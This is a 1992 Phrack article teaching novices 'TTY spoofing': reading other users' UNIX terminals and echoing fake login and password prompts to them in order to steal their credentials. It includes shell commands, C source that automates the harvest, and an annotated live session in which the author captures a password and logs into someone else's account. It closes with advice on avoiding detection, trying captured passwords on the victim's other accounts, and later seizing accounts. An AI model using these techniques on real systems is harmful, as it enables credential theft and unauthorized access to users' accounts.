==Phrack Inc.==
Volume Four, Issue Forty-One, File 8 of 13
++++++++++++++++++++++++++++
+++++++ +++++++
+++++++ TTY SPOOFING +++++++
+++++++ +++++++
++++++ BY ++++++
+++++ +++++
+++ VaxBuster +++
++ ++
++++++++++++++++++++++++++++
July 16, 1992
Please note that this file is ONLY to be distributed as part of Phrack,
and will NOT be distributed to any other person or magazine for release.
More detailed instructions have been provided so that the novice hacker is
able to understand them; therefore, all experienced hackers should be able to
breeze right through this without having to worry about the specific command
syntax provided.
On UNIX systems, there are many ways to obtain account names and
passwords. Some hackers prefer to swipe the password file and run programs
like Crack and Killer Cracker on them in order to get account names and
passwords. Others rely on bugs or holes in the system in order to gain root
access. Both these methods work, but what do you do if your password file is
shadowed (and it is NOT a yellow pages file!)? And what do you do if all the
holes have been patched over from years of previous hackers abusing them? Well,
I happen to have found a system where all this is true. I have even allowed
hackers to use one of my accounts to try to gain root privs, and of the 10 or
so that have tried, they have all failed. My only recourse was to find SOME
other way to get accounts on the system to maintain MY security.
TTY spoofing is often looked at as being lame, and some don't even
consider it a "hacking technique." People usually completely overlook it, and
many others don't even know about it, or know HOW to do it. I suppose I should
start out by defining the term. TTY spoofing is either installing a Trojan
horse type program to sit and watch a certain (or multiple) tty and wait for a
user to login. Instead of getting the normal system prompt, the program YOU
installed echoes the standard "login:" prompt, and then after they type in
their username, it prompts them for "<username> password:" and boom, you have a
new account. This can be done by a program or, in many cases, manually.
Of all the people I know, 90 percent of them scream at me saying that this
is impossible because their system doesn't allow read/write access to the tty.
When I make references to tty, I mean the physical device filename or
/dev/ttyxx where xx is either numeric, alphabetic, or alphanumeric characters
(e.g., 03, pa, p4 are all valid). Of all the systems I've been on, I've never
seen one that doesn't allow reading/writing to a LOGIN process. See, the
system doesn't change the tty to owner r/w ONLY until AFTER HIS USERNAME AND
PASSWORD HAS BEEN VERIFIED. Console, or ttyco, is an exception where the perms
are ALWAYS -rw------.
Now that you know WHAT tty spoofing is and the general idea behind WHY it
works, I'll start to tell you the many ways it can be done.
In order to tty spoof, you MUST have at least ONE valid account on the
system. You can obtain the account via a little social engineering, or you
could try a /who *sitename in the IRC to get nicknames and use their username
and try to hack out the password. Try looking for users in #hottub and other
st00pid channels because they are the ones who would tend to have the easy
passwords. Or use any other method that you can think of to obtain an account.
Once you have an account, the rest is the easy part. Simply create a
script in vi or emacs that redirects input from UNUSED tty's to cat. Since you
are cat's standard output, everything coming FROM the monitored tty will come
to your screen. You probably want to watch about 10 or 15 terminals. An
example script would be:
cat </dev/tty01&
cat </dev/tty02&
cat </dev/ttypa&
cat </dev/ttyp1&
Then you want to just run your script with source. Once a user walks up
to a terminal (or remotely logs in via telnet, etc.), they will try to press
return and attempt to get a login prompt. Many users will also type their
username, thinking that the system is just waiting for it. Make sure you write
down the username. After a while, they will probably start pressing control
characters, like control-d or z or whatever. Here's the problem: when CAT
encounters the ^D, it thinks that it is receiving an EOF in the file and it
thinks its job is done. You'll get something to the effect of:
[2] Exit DONE cat </dev/tty01
or
[2] Exit 1 cat:i/o error cat </dev/tty01
You want to IMMEDIATELY (if not sooner) "recat" that terminal. Once you get
that DONE signal, you now know WHAT terminal is active. You want to then type
something to the effect of 'echo -n "login:" >/dev/tty01&'. The & is important
because if the user decided to switch terminals, echo could lock up and freeze
your control on the account. If after about 10 seconds echo doesn't come back
as:
[5] Exit DONE echo -n login: >/dev/tty01
KILL the process. When you ran the echo command, the shell gave you a
processid. Just type KILL processid. If the done echo line DOES come back,
that means that it was successfully printed on the user's screen. He will then
type in his username. WRITE THIS DOWN. If you are ever in doubt that the word
on your screen is a username, type 'grep word /etc/passwd' and if a line comes
up, you know it's valid. If grep doesn't return anything, still keep it
because it might be a password. Then wait about 2 seconds, and type
'echo -n "<username> password:" >/dev/tty01&' again using the & to prevent
lockage. If that command doesn't come back in about 10 seconds, kill the
process off and you can assume that you lost the user (e.g. he moved to another
terminal). If the done echo line DOES come back, then in about 2 seconds, you
SHOULD see his password come up. If you do, write it down, and boom, you have
a new account.
This may seem like a time consuming process and a lot of work, but
considering that if you have macros with the "cat </dev/tty" command and the
echo -n commands preset, it will be a breeze. Okay - so you say to yourself,
"I'm a lazy shit, and just want passwords to be handed to me on a silver
platter." With a little bit of work, you can do that! Below is a few lines of
C source code that can be used to automate this process. Anyone who knows C
should be able to put something together in no time.
#include <stdio.h>
FILE *fp, *fp2;
char username[10], password[10];
main()
{
fp=fopen("/dev/ttyp1", "r");
fp2=fopen("/dev/ttyp1", "w");
fprintf(fp2, "login:");
fscanf(fp, "%s", &username);
/* Put delay commands in here */
fprintf(fp2, "%s password:", username);
fscanf(fp, "%s", @password);
printf("Your new account info is %s, with password %s.", username,
password);
}
This is a VERY basic setup. One could fairly easily have the program take
arguments from the command line, like a range of tty's, and have the output
sent to a file.
Below is an actual session of manual tty spoofing. The usernames and
passwords HAVE been changed because they will probably be active when you read
this. Some c/r's and l/f's have been cut to save space. Please notice the
time between the startup and getting a new account is only seven minutes.
Using this technique does not limit the hacked passwords to dictionary
derivatives like Crack and other programs.
source mycats ; This file contains cats
; for terminals tty03 - tty10
[1] 29377
/dev/tty03: Permission denied ; All this means is that someone is logged
in
; and has their mesg set to NO. Ignore it.
[1] Exit 1 cat < /dev/tty03
[2] 29378
[3] 29379
/dev/tty06: Permission denied
/dev/tty05: Permission denied
[4] Exit 1 cat < /dev/tty06
[3] Exit 1 cat < /dev/tty05
/dev/tty07: Permission denied
[3] Exit 1 cat < /dev/tty07
/dev/tty08: Permission denied
[3] Exit 1 cat < /dev/tty08
[2] + Stopped (tty input) cat < /dev/tty04 ;This was the terminal I
was
;on - it's automatically
;aborted...
[3] 29383
<5:34pm><~> /dev/tty09: Permission denied
[3] Exit 1 cat < /dev/tty09
<5:34pm><~> source mycats2 ;This one contains 34 - 43
[3] 29393
[4] 29394
[5] 29395
[6] 29396
[7] 29397
[8] 29398
[9] 29399
/dev/tty36: Permission denied
/dev/tty37: Permission denied
/dev/tty38: Permission denied
/dev/tty39: Permission denied
/dev/tty40: Permission denied
/dev/tty34: Permission denied
/dev/tty35: Permission denied
[9] Exit 1 cat < /dev/tty40
[8] Exit 1 cat < /dev/tty39
[7] Exit 1 cat < /dev/tty38
[6] Exit 1 cat < /dev/tty37
[5] Exit 1 cat < /dev/tty36
[4] Exit 1 cat < /dev/tty35
[3] Exit 1 cat < /dev/tty34
[1] 29400
[3] 29401
[4] 29402
<5:34pm><~> /dev/tty41: Permission denied
[1] Exit 1 cat < /dev/tty41
/dev/tty43: Permission denied
[4] Exit 1 cat < /dev/tty43
/dev/tty42: Permission denied
[3] Exit 1 cat < /dev/tty42
<5:34pm><~> source mycats3 ;This contains p1-pa
[3] 29404
[4] 29405
[5] 29406
[6] 29407
[7] 29408
/dev/ttyp1: Permission denied
/dev/ttyp3: Permission denied
/dev/ttyp5: Permission denied
/dev/ttyp6: Permission denied
[8] Exit 1 cat < /dev/ttyp6
[7] Exit 1 cat < /dev/ttyp5
[5] Exit 1 cat < /dev/ttyp3
[3] Exit 1 cat < /dev/ttyp1
[7] 29410
[8] 29411
[9] 29412
[1] 29413
<5:34pm><~> /dev/ttyp7: Permission denied
[7] Exit 1 cat < /dev/ttyp7
/dev/ttypa: Permission denied
[1] Exit 1 cat < /dev/ttypa
<5:34pm><~> source mycats4 ;Last one is q0-qa
[1] 29426
[3] 29427
[5] 29428
[7] 29429
[10] 29430
[11] 29431
/dev/ttyq5: Permission denied
[10] Exit 1 cat < /dev/ttyq5
[12] 29432
[10] 29433
[13] 29434
[14] 29435
<5:34pm><~> who
<5:34pm><~> nnnnnnnnrlogin unx ; He thought he didn't type it right.
pigsnort ; Important! Write down ALL non-
; system sent messages!
<5:35pm><~>
grep pigsnort /etc/passwd ; Check with grep to see if it's an
; account.
<5:35pm><~> ; Didn't return anything - must be a
; a password!
nnnpptst8 ; Sure looks like an account name to
nnnnn===== ; me! Write it down!
ls
[8] Done cat < /dev/ttyp8 ; Asshole pressed control-d.
; 'recat' the terminal!
<5:36pm><~> cat < /d e v/ ttyp8& ; This is the 'recat.'
[8] 29459
<5:36pm><~> cat: read error: I/O error ; Asshole is now trying all
; sorts of control characters
; sending UNIX into a fit.
[4] Exit 1 cat < /dev/ttyp2
<5:36pm><~> cat </dev/ttyp2& ; 'recat' it!
[4] 29465
<5:36pm><~>
<5:36pm><~>
[6] Done cat < /dev/ttyp4 ; Someone had to press the
; character, so this is active.
<5:36pm><~> cat </dev/ttyp4& ; 'recat' the ctrl-d.
[6] 29468
<5:36pm><~> echo -n "login:" >/dev/ttyble1 ; Try echo'ing a fake login
cat: read error: I/O error ; to the active terminal.
[6] Exit 1 cat < /dev/ttyp4
poop4d ; Here goes another password.
p4 ; Couldn't find the matching
& ; account.
[6] 29470
<5:37pm><~> cat: read error: I/O error
[4] Exit 1 cat < /dev/ttyp2
<5:37pm><~> cat </dev/ttyp2&
[4] 29489
<5:37pm><~> echo -n "login:" >/dev/ttyp2& ; Try echo'ing a fake login
; prompt again.
[15] 29490
<5:37pm><~> kill 29490 ; Login prompt didn't return
; within a few seconds so we
; kill it.
[15] Terminated echo -n login: > /dev/ttyp2
<5:37pm><~> cat </dev/tty
echo -n "login:" >/dev/ttyp4&
[15] 29491
<5:38pm><~> kill 29491
<5:38pm><~> grep pptst8 /etc/passwd ; Make sure it's an account!
pptst8:X:58479:4129:People Eater:/ucuc.edu/usr/pptst8:/bin/bash
<5:38pm><~> grep ble1 /etc/passwd ; This isn't an account...
<5:39pm><~> grep poop4d /etc/passwd ; Neither is this - probably
; a password...
<5:39pm><~> who ; See if any of the users we
; caught fell through an
; 'uncatted' terminal...
<5:39pm><~> ps -x ; View all our processes.
; DAMN glad that the cat's
PID TT STAT TIME COMMAND ; don't come up in the process
29266 04 S 0:04 -tcsh (tcsh) ; list!
29378 04 T 0:00 cat
29412 04 I 0:00 -tcsh (tcsh)
29426 04 I 0:00 -tcsh (tcsh)
29427 04 I 0:00 -tcsh (tcsh)
29428 04 I 0:00 -tcsh (tcsh)
29429 04 I 0:00 -tcsh (tcsh)
29431 04 I 0:00 -tcsh (tcsh)
29432 04 I 0:00 -tcsh (tcsh)
29433 04 I 0:00 -tcsh (tcsh)
29434 04 I 0:00 -tcsh (tcsh)
29435 04 I 0:00 -tcsh (tcsh)
29459 04 I 0:00 -tcsh (tcsh)
29470 04 D 0:00 <exiting>
29489 04 I 0:00 -tcsh (tcsh)
29491 04 D 0:00 -tcsh (tcsh)
29547 04 R 0:00 ps -x
<5:40pm><~> kill 29378 29412 29426 29427 29428 29429 29431 29432 29433 29434 29
435 29459 29470 29489 289491 ;Kill off all processes.
29470: No such process
[4] Terminated cat < /dev/ttyp2
[8] Terminated cat < /dev/ttyp8
[14] Terminated cat < /dev/ttyqa
[13] Terminated cat < /dev/ttyq9
[10] Terminated cat < /dev/ttyq8
[12] Terminated cat < /dev/ttyq7
[11] Terminated cat < /dev/ttyq6
[7] Terminated cat < /dev/ttyq4
[5] Terminated cat < /dev/ttyq3
[3] Terminated cat < /dev/ttyq2
[1] Terminated cat < /dev/ttyq1
[9] Terminated cat < /dev/ttyp9
[2] Terminated cat < /dev/tty04
<5:41pm><~>
[15] Terminated echo -n login: > /dev/ttyp4
[6] Done echo -n login: > /dev/ttyp4
<5:41pm><~> ps -x
PID TT STAT TIME COMMAND
29266 04 S 0:04 -tcsh (tcsh)
29594 04 R 0:00 ps -x
<5:41pm><~> logout
Local -011- Session 1 disconnected from UNIX1
Local> c unx ; Notice it's a different
; system but shares passwords.
Local -010- Session 1 to UNX on node MYUNX established
Welcome to ucuc.edu.
login: ble1 ; Test out all the accounts
ble1 password: [I tried poop4d] ; with all the passwords.
Login failed.
login: pptst8
pptst8 password: [I tried poop4d here too.]
Login failed.
login: pptst8
pptst8 password: [I typed pigsnort]
Authenticated via AFS Kerberos. ; BINGO! We're in!
Checking system rights for <pptst8>... login permitted.
login 1.0(2), Authen
Last login: Fri Jul 17 17:33:30 on tty11
(1) unix $ ls ; Let's see what this sucker
; has...hmm...an IRC user, eh?
Mail Mailbox News bin irc other junk private
public
(2) unix $ logout
Local -011- Session 1 disconnected from UNX
A few words of advice: Monitor the tty's when it's the busiest time of
the day, usually about 11am on a university system. Kill all your processes
before you hang up. Those processes that you run will sit on the system and
can be found by sysadmins. Also, they will tie up those tty's that you are
monitoring, which can also cause problems. Point is, you DON'T want to attract
attention to what you're doing. Don't test the accounts you get immediately.
If the victim happens to be doing a 'who' and sees two of himself, he is going
to shit. Wait until later or use a different subsystem that won't show up on
his 'who'.
Don't take over accounts. All the real user has to do is call up the office
and tell them that their password was changed. In two seconds, it'll be
changed back, plus the sysadmin will be on the lookout so you're just one step
BEHIND where you started. Once you have someone's account info, kill the cat
that is sucking the terminal so that the user can log in normally. If he
continues not to get ANYTHING, he may go and solicit some "professional" help,
and THEY might know what's going on, so let the sucker log in. Another thing:
with accounts you get.
DO NOT DESTROY ANYTHING in the system, not in their account, and no where else
if you get higher privs. Chances are that the person is NOT going to know
someone has obtained their password, and will have NO reason to change it.
Wait until his college term/semester ends and then monitor the file dates. If
after about a month the dates don't change, change the password and do whatever
you want to the account because he's probably done with it.
Oh and one last thing. Once you have a valid account, grep the username and
get the REAL name. Then grep the REAL name and find out all accounts on the
system that the guy owns. Chances are that he is using the same password in
multiple accounts!
Thanks go to Pointman, #hack members, and the entire current/past Phrack staff
for putting out an excellent magazine over the years.
If you need to contact me, try the IRC in #hack and the VMB world. I usually
prefer NOT to be contacted by e-mail, but if you have my address and have an
important question, go for it. I'm willing to help any beginners who need it.
Happy Hacking!
VaxBuster '92